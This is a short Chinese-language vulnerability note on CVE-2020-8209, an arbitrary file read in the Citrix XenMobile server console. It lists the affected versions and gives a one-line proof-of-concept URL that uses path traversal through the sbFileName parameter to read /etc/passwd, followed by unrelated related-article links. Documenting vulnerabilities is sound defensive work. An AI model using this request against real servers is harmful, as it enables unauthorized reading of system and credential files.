CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞

简介: XenMobile提供了一种可靠的移动设备管理解决方案,可以对企业设备和员工个人设备进行基于角色的管理、配置和支持并确保安全性。与只能提供基本设备管理软件的大多数厂商不同,XenMobile可提供多种高级功能和特性来确保移动应用可随时用于业务目的并确保移动内容安全性,如区域防护(geo-fencing)、自动化合规性及一键式实时聊天和支持等。


漏洞简介

产品版本:

RP2之前的XenMobile服务器10.12

RP4之前的XenMobile服务器10.11

RP6之前的XenMobile服务器10.10

10.9 RP5之前的XenMobile服务器

漏洞复现

poc

https://x.x.x.x:8443/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

相关文章
|
安全
关于exploit-db上的针对Lotus domino控制台绕过的漏洞的解释
控制台绕过的条件: 1. 安装domino程序 2. 停止当前运行的服务 nserver.exe -c exit 3.
1284 0
|
7月前
|
Java
java实战项目超市管理系统控制台版
java实战项目超市管理系统控制台版
|
7月前
|
Java
【Java开发指南 | 第二十篇】Java流之控制台
【Java开发指南 | 第二十篇】Java流之控制台
67 2
|
7月前
|
XML 监控 Dubbo
Dubbo03【管理控制台和监控中心搭建】,Java开发实用必备的几款插件
Dubbo03【管理控制台和监控中心搭建】,Java开发实用必备的几款插件
|
7月前
|
存储 Java 关系型数据库
景区特色商品管理系统【控制台+MySQL】(Java课设)
景区特色商品管理系统【控制台+MySQL】(Java课设)
102 1
|
7月前
|
存储 Java 关系型数据库
银行储蓄管理系统【控制台+MySQL】(Java课设)
银行储蓄管理系统【控制台+MySQL】(Java课设)
121 1
|
7月前
|
存储 Java 关系型数据库
员工信息管理系统【控制台+MySQL】(Java课设)
员工信息管理系统【控制台+MySQL】(Java课设)
53 0
员工信息管理系统【控制台+MySQL】(Java课设)
|
7月前
|
存储 Java 关系型数据库
教师工资管理系统【控制台+MySQL】(Java课设)
教师工资管理系统【控制台+MySQL】(Java课设)
89 0
|
7月前
|
存储 Java 关系型数据库
员工工资管理系统【控制台+MySQL】(Java课设)
员工工资管理系统【控制台+MySQL】(Java课设)
69 0
|
7月前
|
存储 Java 关系型数据库
长途汽车售票管理系统【控制台+MySQL】(Java课设)
长途汽车售票管理系统【控制台+MySQL】(Java课设)
66 0